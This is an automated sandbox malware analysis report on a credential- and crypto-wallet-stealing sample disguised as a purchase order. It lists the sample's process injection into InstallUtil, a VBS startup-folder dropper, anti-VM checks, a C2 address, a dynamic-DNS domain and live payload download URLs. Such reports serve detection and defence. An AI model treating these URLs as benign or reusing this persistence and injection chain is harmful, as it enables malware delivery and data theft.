Windows Analysis Report
PO-12202432_ACD_Group.pif.exe

Overview

General Information

Sample name: PO-12202432_ACD_Group.pif.exe
Analysis ID: 1586913
MD5: 95bec6594e293a42f4abb049ea7e81db
SHA1: 36ece8150f0619fc81bbf92bd840cad252bf1aea
SHA256: 43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
Tags: exeuser-lowmal3

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
AI detected suspicious sample
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PO-12202432_ACD_Group.pif.exe (PID: 3668 cmdline: "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
    • InstallUtil.exe (PID: 5008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsNestedFamANDAssem.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
      • InstallUtil.exe (PID: 5488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2380281455.0000000004803000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2165084237.00000000066B0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
5.2.IsNestedFamANDAssem.exe.4803b08.5.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.PO-12202432_ACD_Group.pif.exe.66b0000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.PO-12202432_ACD_Group.pif.exe.3e609a0.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                  System Summary

                  Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7056, ProcessName: wscript.exe
                  Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7056, ProcessName: wscript.exe

                  Data Obfuscation

                  Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, ProcessId: 3668, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-01-09T18:57:13.558600+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 193.187.91.218 | 50787 | 192.168.2.5 | 49710 | TCP

                  AV Detection

                  Source: PO-12202432_ACD_Group.pif.exe, Avira: detected
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Avira: detection malicious, Label: HEUR/AGEN.1308638
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, ReversingLabs: Detection: 68%
                  Source: PO-12202432_ACD_Group.pif.exe, ReversingLabs: Detection: 68%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Joe Sandbox ML: detected
                  Source: PO-12202432_ACD_Group.pif.exe, Joe Sandbox ML: detected
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 067DE693h0_2_067DE318
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 067DE693h0_2_067DE497
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 067DE693h0_2_067DE308
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06EAE693h5_2_06EAE318
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06EAE693h5_2_06EAE497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06EAE693h5_2_06EAE308

                  Networking

                  Source: Network traffic, Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.2.5:49710
                  Source: unknown, DNS query: name: pureeratee.duckdns.org
                  Source: global traffic, TCP traffic: 192.168.2.5:49710 -> 193.187.91.218:50787
                  Source: Joe Sandbox View, ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global traffic, HTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36, Host: www.chirreeirl.com, Connection: Keep-Alive
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic, DNS traffic detected: DNS query: www.chirreeirl.com
                  Source: global traffic, DNS traffic detected: DNS query: pureeratee.duckdns.org
                  Source: InstallUtil.exe, 00000002.00000002.4465370067.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: InstallUtil.exe, 00000002.00000002.4475159585.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com
                  Source: PO-12202432_ACD_Group.pif.exe, IsNestedFamANDAssem.exe.0.drString found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.5:49712 version: TLS 1.2

                  System Summary

                  Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, Code function: 0_2_067C1C88 NtProtectVirtualMemory,0_2_067C1C88
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, Code function: 0_2_067C4B38 NtResumeThread,0_2_067C4B38
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, Code function: 0_2_067C1C81 NtProtectVirtualMemory,0_2_067C1C81
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, Code function: 0_2_067C4B30 NtResumeThread,0_2_067C4B30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Code function: 5_2_06CDFEC0 NtProtectVirtualMemory,5_2_06CDFEC0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Code function: 5_2_06CDFEB8 NtProtectVirtualMemory,5_2_06CDFEB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Code function: 5_2_06CDFF89 NtProtectVirtualMemory,5_2_06CDFF89
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Code function: 5_2_06E931D8 NtResumeThread,5_2_06E931D8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe, Code function: 5_2_06E931D0 NtResumeThread,5_2_06E931D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB243C6_2_02BB243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24786_2_02BB2478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24626_2_02BB2462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB455F6_2_02BB455F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1A306_2_02BB1A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1A406_2_02BB1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB4B406_2_02BB4B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1E306_2_02BB1E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1E206_2_02BB1E20
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000000.2008380460.0000000000802000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002E66000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOrkexnhsfu.exe" vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2147980607.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFozxv.dll" vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe | Binary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                  Source: PO-12202432_ACD_Group.pif.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO-12202432_ACD_Group.pif.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: PO-12202432_ACD_Group.pif.exe | ReversingLabs: Detection: 68%
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | File read: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: PO-12202432_ACD_Group.pif.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO-12202432_ACD_Group.pif.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000005.00000002.2380281455.0000000004C98000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: Yara match | File source: 5.2.IsNestedFamANDAssem.exe.4803b08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.PO-12202432_ACD_Group.pif.exe.66b0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.PO-12202432_ACD_Group.pif.exe.3e609a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.2380281455.0000000004803000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2165084237.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2157610900.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 3668, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: IsNestedFamANDAssem.exe PID: 2300, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_010626C0 push esp; ret 0_2_010626C9
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_05AF0A07 push es; retf 0_2_05AF0A08
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065AABEE push eax; iretd 0_2_065AAC45
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065AABE1 push es; retf 0_2_065AABEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065A0905 push esp; ret 0_2_065A090D
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066092E0 push eax; iretd 0_2_066095B1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06603290 push es; ret 0_2_06603340
